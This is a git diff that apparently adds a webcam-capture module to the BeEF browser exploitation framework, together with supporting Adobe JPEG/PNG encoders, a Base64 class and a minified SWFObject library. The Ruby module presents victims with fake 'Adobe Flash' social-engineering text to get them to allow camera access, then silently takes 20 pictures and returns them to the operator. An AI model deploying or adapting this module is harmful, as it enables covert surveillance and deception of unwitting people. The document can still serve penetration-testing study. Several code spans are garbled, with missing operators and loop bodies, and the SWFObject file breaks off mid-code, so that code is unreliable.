0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,0xb5,0xb6, + 0xb7,0xb8,0xb9,0xba,0xc2,0xc3,0xc4,0xc5, + 0xc6,0xc7,0xc8,0xc9,0xca,0xd2,0xd3,0xd4, + 0xd5,0xd6,0xd7,0xd8,0xd9,0xda,0xe1,0xe2, + 0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea, + 0xf1,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8, + 0xf9,0xfa + ]; + + private var std_dc_chrominance_nrcodes:Array = [0,0,3,1,1,1,1,1,1,1,1,1,0,0,0,0,0]; + private var std_dc_chrominance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11]; + private var std_ac_chrominance_nrcodes:Array 
= [0,0,2,1,2,4,4,3,4,7,5,4,4,0,1,2,0x77]; + private var std_ac_chrominance_values:Array = [ + 0x00,0x01,0x02,0x03,0x11,0x04,0x05,0x21, + 0x31,0x06,0x12,0x41,0x51,0x07,0x61,0x71, + 0x13,0x22,0x32,0x81,0x08,0x14,0x42,0x91, + 0xa1,0xb1,0xc1,0x09,0x23,0x33,0x52,0xf0, + 0x15,0x62,0x72,0xd1,0x0a,0x16,0x24,0x34, + 0xe1,0x25,0xf1,0x17,0x18,0x19,0x1a,0x26, + 0x27,0x28,0x29,0x2a,0x35,0x36,0x37,0x38, + 0x39,0x3a,0x43,0x44,0x45,0x46,0x47,0x48, + 0x49,0x4a,0x53,0x54,0x55,0x56,0x57,0x58, + 0x59,0x5a,0x63,0x64,0x65,0x66,0x67,0x68, + 0x69,0x6a,0x73,0x74,0x75,0x76,0x77,0x78, + 0x79,0x7a,0x82,0x83,0x84,0x85,0x86,0x87, + 0x88,0x89,0x8a,0x92,0x93,0x94,0x95,0x96, + 0x97,0x98,0x99,0x9a,0xa2,0xa3,0xa4,0xa5, + 0xa6,0xa7,0xa8,0xa9,0xaa,0xb2,0xb3,0xb4, + 0xb5,0xb6,0xb7,0xb8,0xb9,0xba,0xc2,0xc3, + 0xc4,0xc5,0xc6,0xc7,0xc8,0xc9,0xca,0xd2, + 0xd3,0xd4,0xd5,0xd6,0xd7,0xd8,0xd9,0xda, + 0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9, + 0xea,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8, + 0xf9,0xfa + ]; + + private function initHuffmanTbl():void + { + YDC_HT = computeHuffmanTbl(std_dc_luminance_nrcodes,std_dc_luminance_values); + UVDC_HT = computeHuffmanTbl(std_dc_chrominance_nrcodes,std_dc_chrominance_values); + YAC_HT = computeHuffmanTbl(std_ac_luminance_nrcodes,std_ac_luminance_values); + UVAC_HT = computeHuffmanTbl(std_ac_chrominance_nrcodes,std_ac_chrominance_values); + } + + private var bitcode:Array = new Array(65535); + private var category:Array = new Array(65535); + + private function initCategoryNumber():void + { + var nrlower:int = 1; + var nrupper:int = 2; + var nr:int; + for (var cat:int=1; cat<=15; cat++) { + //Positive numbers + for (nr=nrlower; nr= 0 ) { + if (value & uint(1 << posval) ) { + bytenew |= uint(1 << bytepos); + } + posval--; + bytepos--; + if (bytepos < 0) { + if (bytenew == 0xFF) { + writeByte(0xFF); + writeByte(0); + } + else { + writeByte(bytenew); + } + bytepos=7; + bytenew=0; + } + } + } + + private function writeByte(value:int):void + { + byteout.writeByte(value); + } + + 
private function writeWord(value:int):void + { + writeByte((value>>8)&0xFF); + writeByte((value )&0xFF); + } + + // DCT & quantization core + + private function fDCTQuant(data:Array, fdtbl:Array):Array + { + var tmp0:Number, tmp1:Number, tmp2:Number, tmp3:Number, tmp4:Number, tmp5:Number, tmp6:Number, tmp7:Number; + var tmp10:Number, tmp11:Number, tmp12:Number, tmp13:Number; + var z1:Number, z2:Number, z3:Number, z4:Number, z5:Number, z11:Number, z13:Number; + var i:int; + /* Pass 1: process rows. */ + var dataOff:int=0; + for (i=0; i<8; i++) { + tmp0 = data[dataOff+0] + data[dataOff+7]; + tmp7 = data[dataOff+0] - data[dataOff+7]; + tmp1 = data[dataOff+1] + data[dataOff+6]; + tmp6 = data[dataOff+1] - data[dataOff+6]; + tmp2 = data[dataOff+2] + data[dataOff+5]; + tmp5 = data[dataOff+2] - data[dataOff+5]; + tmp3 = data[dataOff+3] + data[dataOff+4]; + tmp4 = data[dataOff+3] - data[dataOff+4]; + + /* Even part */ + tmp10 = tmp0 + tmp3; /* phase 2 */ + tmp13 = tmp0 - tmp3; + tmp11 = tmp1 + tmp2; + tmp12 = tmp1 - tmp2; + + data[dataOff+0] = tmp10 + tmp11; /* phase 3 */ + data[dataOff+4] = tmp10 - tmp11; + + z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */ + data[dataOff+2] = tmp13 + z1; /* phase 5 */ + data[dataOff+6] = tmp13 - z1; + + /* Odd part */ + tmp10 = tmp4 + tmp5; /* phase 2 */ + tmp11 = tmp5 + tmp6; + tmp12 = tmp6 + tmp7; + + /* The rotator is modified from fig 4-8 to avoid extra negations. */ + z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */ + z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */ + z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */ + z3 = tmp11 * 0.707106781; /* c4 */ + + z11 = tmp7 + z3; /* phase 5 */ + z13 = tmp7 - z3; + + data[dataOff+5] = z13 + z2; /* phase 6 */ + data[dataOff+3] = z13 - z2; + data[dataOff+1] = z11 + z4; + data[dataOff+7] = z11 - z4; + + dataOff += 8; /* advance pointer to next row */ + } + + /* Pass 2: process columns. 
*/ + dataOff = 0; + for (i=0; i<8; i++) { + tmp0 = data[dataOff+ 0] + data[dataOff+56]; + tmp7 = data[dataOff+ 0] - data[dataOff+56]; + tmp1 = data[dataOff+ 8] + data[dataOff+48]; + tmp6 = data[dataOff+ 8] - data[dataOff+48]; + tmp2 = data[dataOff+16] + data[dataOff+40]; + tmp5 = data[dataOff+16] - data[dataOff+40]; + tmp3 = data[dataOff+24] + data[dataOff+32]; + tmp4 = data[dataOff+24] - data[dataOff+32]; + + /* Even part */ + tmp10 = tmp0 + tmp3; /* phase 2 */ + tmp13 = tmp0 - tmp3; + tmp11 = tmp1 + tmp2; + tmp12 = tmp1 - tmp2; + + data[dataOff+ 0] = tmp10 + tmp11; /* phase 3 */ + data[dataOff+32] = tmp10 - tmp11; + + z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */ + data[dataOff+16] = tmp13 + z1; /* phase 5 */ + data[dataOff+48] = tmp13 - z1; + + /* Odd part */ + tmp10 = tmp4 + tmp5; /* phase 2 */ + tmp11 = tmp5 + tmp6; + tmp12 = tmp6 + tmp7; + + /* The rotator is modified from fig 4-8 to avoid extra negations. */ + z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */ + z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */ + z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */ + z3 = tmp11 * 0.707106781; /* c4 */ + + z11 = tmp7 + z3; /* phase 5 */ + z13 = tmp7 - z3; + + data[dataOff+40] = z13 + z2; /* phase 6 */ + data[dataOff+24] = z13 - z2; + data[dataOff+ 8] = z11 + z4; + data[dataOff+56] = z11 - z4; + + dataOff++; /* advance pointer to next column */ + } + + // Quantize/descale the coefficients + for (i=0; i<64; i++) { + // Apply the quantization and scaling factor & Round to nearest integer + data[i] = Math.round((data[i]*fdtbl[i])); + } + return data; + } + + // Chunk writing + + private function writeAPP0():void + { + writeWord(0xFFE0); // marker + writeWord(16); // length + writeByte(0x4A); // J + writeByte(0x46); // F + writeByte(0x49); // I + writeByte(0x46); // F + writeByte(0); // = "JFIF",'\0' + writeByte(1); // versionhi + writeByte(1); // versionlo + writeByte(0); // xyunits + writeWord(1); // xdensity + writeWord(1); // ydensity + writeByte(0); // thumbnwidth + writeByte(0); // 
thumbnheight + } + + private function writeSOF0(width:int, height:int):void + { + writeWord(0xFFC0); // marker + writeWord(17); // length, truecolor YUV JPG + writeByte(8); // precision + writeWord(height); + writeWord(width); + writeByte(3); // nrofcomponents + writeByte(1); // IdY + writeByte(0x11); // HVY + writeByte(0); // QTY + writeByte(2); // IdU + writeByte(0x11); // HVU + writeByte(1); // QTU + writeByte(3); // IdV + writeByte(0x11); // HVV + writeByte(1); // QTV + } + + private function writeDQT():void + { + writeWord(0xFFDB); // marker + writeWord(132); // length + writeByte(0); + var i:int; + for (i=0; i<64; i++) { + writeByte(YTable[i]); + } + writeByte(1); + for (i=0; i<64; i++) { + writeByte(UVTable[i]); + } + } + + private function writeDHT():void + { + writeWord(0xFFC4); // marker + writeWord(0x01A2); // length + var i:int; + + writeByte(0); // HTYDCinfo + for (i=0; i<16; i++) { + writeByte(std_dc_luminance_nrcodes[i+1]); + } + for (i=0; i<=11; i++) { + writeByte(std_dc_luminance_values[i]); + } + + writeByte(0x10); // HTYACinfo + for (i=0; i<16; i++) { + writeByte(std_ac_luminance_nrcodes[i+1]); + } + for (i=0; i<=161; i++) { + writeByte(std_ac_luminance_values[i]); + } + + writeByte(1); // HTUDCinfo + for (i=0; i<16; i++) { + writeByte(std_dc_chrominance_nrcodes[i+1]); + } + for (i=0; i<=11; i++) { + writeByte(std_dc_chrominance_values[i]); + } + + writeByte(0x11); // HTUACinfo + for (i=0; i<16; i++) { + writeByte(std_ac_chrominance_nrcodes[i+1]); + } + for (i=0; i<=161; i++) { + writeByte(std_ac_chrominance_values[i]); + } + } + + private function writeSOS():void + { + writeWord(0xFFDA); // marker + writeWord(12); // length + writeByte(3); // nrofcomponents + writeByte(1); // IdY + writeByte(0); // HTY + writeByte(2); // IdU + writeByte(0x11); // HTU + writeByte(3); // IdV + writeByte(0x11); // HTV + writeByte(0); // Ss + writeByte(0x3f); // Se + writeByte(0); // Bf + } + + // Core processing + private var DU:Array = new Array(64); + + private 
function processDU(CDU:Array, fdtbl:Array, DC:Number, HTDC:Array, HTAC:Array):Number + { + var EOB:BitString = HTAC[0x00]; + var M16zeroes:BitString = HTAC[0xF0]; + var i:int; + + var DU_DCT:Array = fDCTQuant(CDU, fdtbl); + //ZigZag reorder + for (i=0;i<64;i++) { + DU[ZigZag[i]]=DU_DCT[i]; + } + var Diff:int = DU[0] - DC; DC = DU[0]; + //Encode DC + if (Diff==0) { + writeBits(HTDC[0]); // Diff might be 0 + } else { + writeBits(HTDC[category[32767+Diff]]); + writeBits(bitcode[32767+Diff]); + } + //Encode ACs + var end0pos:int = 63; + for (; (end0pos>0)&&(DU[end0pos]==0); end0pos--) { + }; + //end0pos = first element in reverse order !=0 + if ( end0pos == 0) { + writeBits(EOB); + return DC; + } + i = 1; + while ( i <= end0pos ) { + var startpos:int = i; + for (; (DU[i]==0) && (i<=end0pos); i++) { + } + var nrzeroes:int = i-startpos; + if ( nrzeroes >= 16 ) { + for (var nrmarker:int=1; nrmarker <= nrzeroes/16; nrmarker++) { + writeBits(M16zeroes); + } + nrzeroes = int(nrzeroes&0xF); + } + writeBits(HTAC[nrzeroes*16+category[32767+DU[i]]]); + writeBits(bitcode[32767+DU[i]]); + i++; + } + if ( end0pos != 63 ) { + writeBits(EOB); + } + return DC; + } + + private var YDU:Array = new Array(64); + private var UDU:Array = new Array(64); + private var VDU:Array = new Array(64); + + private function RGB2YUV(img:BitmapData, xpos:int, ypos:int):void + { + var pos:int=0; + for (var y:int=0; y<8; y++) { + for (var x:int=0; x<8; x++) { + var P:uint = img.getPixel32(xpos+x,ypos+y); + var R:Number = Number((P>>16)&0xFF); + var G:Number = Number((P>> 8)&0xFF); + var B:Number = Number((P )&0xFF); + YDU[pos]=((( 0.29900)*R+( 0.58700)*G+( 0.11400)*B))-128; + UDU[pos]=(((-0.16874)*R+(-0.33126)*G+( 0.50000)*B)); + VDU[pos]=((( 0.50000)*R+(-0.41869)*G+(-0.08131)*B)); + pos++; + } + } + } + + /** + * Constructor for JPEGEncoder class + * + * @param quality The quality level between 1 and 100 that detrmines the + * level of compression used in the generated JPEG + * @langversion ActionScript 
3.0 + * @playerversion Flash 9.0 + * @tiptext + */ + public function JPGEncoder(quality:Number = 50) + { + if (quality <= 0) { + quality = 1; + } + if (quality > 100) { + quality = 100; + } + var sf:int = 0; + if (quality < 50) { + sf = int(5000 / quality); + } else { + sf = int(200 - quality*2); + } + // Create tables + initHuffmanTbl(); + initCategoryNumber(); + initQuantTables(sf); + } + + /** + * Created a JPEG image from the specified BitmapData + * + * @param image The BitmapData that will be converted into the JPEG format. + * @return a ByteArray representing the JPEG encoded image data. + * @langversion ActionScript 3.0 + * @playerversion Flash 9.0 + * @tiptext + */ + public function encode(image:BitmapData):ByteArray + { + // Initialize bit writer + byteout = new ByteArray(); + bytenew=0; + bytepos=7; + + // Add JPEG headers + writeWord(0xFFD8); // SOI + writeAPP0(); + writeDQT(); + writeSOF0(image.width,image.height); + writeDHT(); + writeSOS(); + + + // Encode 8x8 macroblocks + var DCY:Number=0; + var DCU:Number=0; + var DCV:Number=0; + bytenew=0; + bytepos=7; + for (var ypos:int=0; ypos= 0 ) { + var fillbits:BitString = new BitString(); + fillbits.len = bytepos+1; + fillbits.val = (1<<(bytepos+1))-1; + writeBits(fillbits); + } + + writeWord(0xFFD9); //EOI + return byteout; + } + } +} diff --git a/modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as b/modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as new file mode 100755 index 000000000..83c95f629 --- /dev/null +++ b/modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as 
@@ -0,0 +1,141 @@ +/* + Copyright (c) 2008, Adobe Systems Incorporated + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + * Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + * Neither the name of Adobe Systems Incorporated nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS + IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, + THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR + CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, + EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, + PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR + PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF + LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING + NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +*/ +package com.adobe.images +{ + import flash.geom.*; + import flash.display.Bitmap; + import flash.display.BitmapData; + import flash.utils.ByteArray; + + /** + * Class that converts BitmapData into a valid PNG + */ + public class PNGEncoder + { + /** + * Created a PNG image from the specified BitmapData + * + * @param image The BitmapData that will be converted into the PNG format. 
+ * @return a ByteArray representing the PNG encoded image data. + * @langversion ActionScript 3.0 + * @playerversion Flash 9.0 + * @tiptext + */ + public static function encode(img:BitmapData):ByteArray { + // Create output byte array + var png:ByteArray = new ByteArray(); + // Write PNG signature + png.writeUnsignedInt(0x89504e47); + png.writeUnsignedInt(0x0D0A1A0A); + // Build IHDR chunk + var IHDR:ByteArray = new ByteArray(); + IHDR.writeInt(img.width); + IHDR.writeInt(img.height); + IHDR.writeUnsignedInt(0x08060000); // 32bit RGBA + IHDR.writeByte(0); + writeChunk(png,0x49484452,IHDR); + // Build IDAT chunk + var IDAT:ByteArray= new ByteArray(); + for(var i:int=0;i < img.height;i++) { + // no filter + IDAT.writeByte(0); + var p:uint; + var j:int; + if ( !img.transparent ) { + for(j=0;j < img.width;j++) { + p = img.getPixel(j,i); + IDAT.writeUnsignedInt( + uint(((p&0xFFFFFF) << 8)|0xFF)); + } + } else { + for(j=0;j < img.width;j++) { + p = img.getPixel32(j,i); + IDAT.writeUnsignedInt( + uint(((p&0xFFFFFF) << 8)| + (p>>>24))); + } + } + } + IDAT.compress(); + writeChunk(png,0x49444154,IDAT); + // Build IEND chunk + writeChunk(png,0x49454E44,null); + // return PNG + return png; + } + + private static var crcTable:Array; + private static var crcTableComputed:Boolean = false; + + private static function writeChunk(png:ByteArray, + type:uint, data:ByteArray):void { + if (!crcTableComputed) { + crcTableComputed = true; + crcTable = []; + var c:uint; + for (var n:uint = 0; n < 256; n++) { + c = n; + for (var k:uint = 0; k < 8; k++) { + if (c & 1) { + c = uint(uint(0xedb88320) ^ + uint(c >>> 1)); + } else { + c = uint(c >>> 1); + } + } + crcTable[n] = c; + } + } + var len:uint = 0; + if (data != null) { + len = data.length; + } + png.writeUnsignedInt(len); + var p:uint = png.position; + png.writeUnsignedInt(type); + if ( data != null ) { + png.writeBytes(data); + } + var e:uint = png.position; + png.position = p; + c = 0xffffffff; + for (var i:int = 0; i < (e-p); i++) 
{ + c = uint(crcTable[ + (c ^ png.readUnsignedByte()) & + uint(0xff)] ^ uint(c >>> 8)); + } + c = uint(c^uint(0xffffffff)); + png.position = e; + png.writeUnsignedInt(c); + } + } +} \ No newline at end of file diff --git a/modules/browser/webcam/dev/com/foxarc/util/Base64.as b/modules/browser/webcam/dev/com/foxarc/util/Base64.as new file mode 100644 index 000000000..fe7d0cd1f --- /dev/null +++ b/modules/browser/webcam/dev/com/foxarc/util/Base64.as 
@@ -0,0 +1,106 @@ +package com.foxarc.util{ + import flash.utils.ByteArray; + public class Base64 { + private static const encodeChars:Array = + ['A','B','C','D','E','F','G','H', + 'I','J','K','L','M','N','O','P', + 'Q','R','S','T','U','V','W','X', + 'Y','Z','a','b','c','d','e','f', + 'g','h','i','j','k','l','m','n', + 'o','p','q','r','s','t','u','v', + 'w','x','y','z','0','1','2','3', + '4','5','6','7','8','9','+','/']; + private static const decodeChars:Array = + [-1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, 62, -1, -1, -1, 63, + 52, 53, 54, 55, 56, 57, 58, 59, + 60, 61, -1, -1, -1, -1, -1, -1, + -1, 0, 1, 2, 3, 4, 5, 6, + 7, 8, 9, 10, 11, 12, 13, 14, + 15, 16, 17, 18, 19, 20, 21, 22, + 23, 24, 25, -1, -1, -1, -1, -1, + -1, 26, 27, 28, 29, 30, 31, 32, + 33, 34, 35, 36, 37, 38, 39, 40, + 41, 42, 43, 44, 45, 46, 47, 48, + 49, 50, 51, -1, -1, -1, -1, -1]; + public static function encode(data:ByteArray):String { + var out:Array = []; + var i:int = 0; + var j:int = 0; + var r:int = data.length % 3; + var len:int = data.length - r; + var c:int; + while (i < len) { + c = data[i++] << 16 | data[i++] << 8 | data[i++]; + out[j++] = encodeChars[c >> 18] + encodeChars[c >> 12 & 0x3f] + encodeChars[c >> 6 & 0x3f] + encodeChars[c & 0x3f]; + } + if (r == 1) { + c = data[i++]; + out[j++] = encodeChars[c >> 2] + encodeChars[(c & 0x03) << 4] + "=="; + } + else if (r == 2) { + c = data[i++] << 8 | data[i++]; + out[j++] = encodeChars[c >> 10] + encodeChars[c >> 4 & 0x3f] + encodeChars[(c & 0x0f) << 2] + "="; + } + return out.join(''); + } + public static function decode(str:String):ByteArray { + var c1:int; + var c2:int; + var c3:int; + var c4:int; + var i:int; + var len:int; + var out:ByteArray; + len = str.length; + i = 0; + out = new ByteArray(); + while (i < len) { + // c1 + do { + c1 = decodeChars[str.charCodeAt(i++) & 0xff]; + } while (i < 
len && c1 == -1); + if (c1 == -1) { + break; + } + // c2 + do { + c2 = decodeChars[str.charCodeAt(i++) & 0xff]; + } while (i < len && c2 == -1); + if (c2 == -1) { + break; + } + out.writeByte((c1 << 2) | ((c2 & 0x30) >> 4)); + // c3 + do { + c3 = str.charCodeAt(i++) & 0xff; + if (c3 == 61) { + return out; + } + c3 = decodeChars[c3]; + } while (i < len && c3 == -1); + if (c3 == -1) { + break; + } + out.writeByte(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2)); + // c4 + do { + c4 = str.charCodeAt(i++) & 0xff; + if (c4 == 61) { + return out; + } + c4 = decodeChars[c4]; + } while (i < len && c4 == -1); + if (c4 == -1) { + break; + } + out.writeByte(((c3 & 0x03) << 6) | c4); + } + return out; + } + } +} \ No newline at end of file diff --git a/modules/browser/webcam/dev/takeit.fla b/modules/browser/webcam/dev/takeit.fla new file mode 100644 index 000000000..7de9b071b Binary files /dev/null and b/modules/browser/webcam/dev/takeit.fla differ diff --git a/modules/browser/webcam/module.rb b/modules/browser/webcam/module.rb new file mode 100644 index 000000000..de2df6639 --- /dev/null +++ b/modules/browser/webcam/module.rb 
@@ -0,0 +1,63 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+require 'base64'
+class Webcam < BeEF::Core::Command
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/takeit.swf', '/takeit', 'swf')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/swfobject.js', '/swfobject', 'js')
+ end
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ social_engineering_title = "This website is using Adobe Flash"
+ social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will increase your user experience."
+ no_of_pictures = 20
+ interval = 1000
+ return [
+ {'name' => 'social_engineering_title',
+ 'description' => 'The title that is shown to the victim.',
+ 'ui_label' => 'Social Engineering Title',
+ 'value' => social_engineering_title,
+ 'width' => '100px' }, {
+ 'name' => 'social_engineering_text',
+ 'description' => 'The social engineering text you want to show to convince the user to click the Allow button.',
+ 'ui_label' => 'Social Engineering Text',
+ 'value' => social_engineering_text,
+ 'width' => '300px',
+ 'type' => 'textarea' }, {
+ 'name' => 'no_of_pictures',
+ 'description' => 'The number of pictures you want to take after the victim clicked "allow".',
+ 'ui_label' => 'Number of pictures',
+ 'value' => no_of_pictures,
+ 'width' => '100px' }, {
+ 'name' => 'interval',
+ 'description' => 'The interval in which pictures are taken.',
+ 'ui_label' => 'Interval to take pictures (ms)',
+ 'value' => interval,
+ 'width' => '100px' }
+ ]
+ end
+
+
+ def post_execute
+ content = {}
+ content["result"] = @datastore["result"] if not @datastore["result"].nil?
+ content["picture"] = @datastore["picture"] if not @datastore["picture"].nil?
+ save content
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
+ end
+
+end
diff --git a/modules/browser/webcam/swfobject.js b/modules/browser/webcam/swfobject.js
new file mode 100755
index 000000000..8eafe9dd8
--- /dev/null
+++ b/modules/browser/webcam/swfobject.js
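Review bot: `post_execute` unbinds both assets as soon as the first result is saved, while `pre_send` binds them on every send; with `no_of_pictures` defaulting to 20 and more than one hooked browser running the module, the unbind triggered by one browser's first result presumably removes the SWF for the others — confirm against the AssetHandler's semantics and consider unbinding only once the last picture has arrived. The `bind` calls register path `/takeit` with extension `swf` but the unbind names `/takeit.swf`; worth confirming both refer to the same asset. `require 'base64'` and the local `configuration = BeEF::Core::Configuration.instance` are never used in this file and can be dropped, and the two `if not @datastore[...].nil?` guards read more naturally as `unless @datastore["result"].nil?`.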
@@ -0,0 +1,4 @@ +/* SWFObject v2.2 + is released under the MIT License +*/ +var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof 
j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y0){for(var af=0;af0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad'}}aa.outerHTML='"+af+"";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var 
X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof 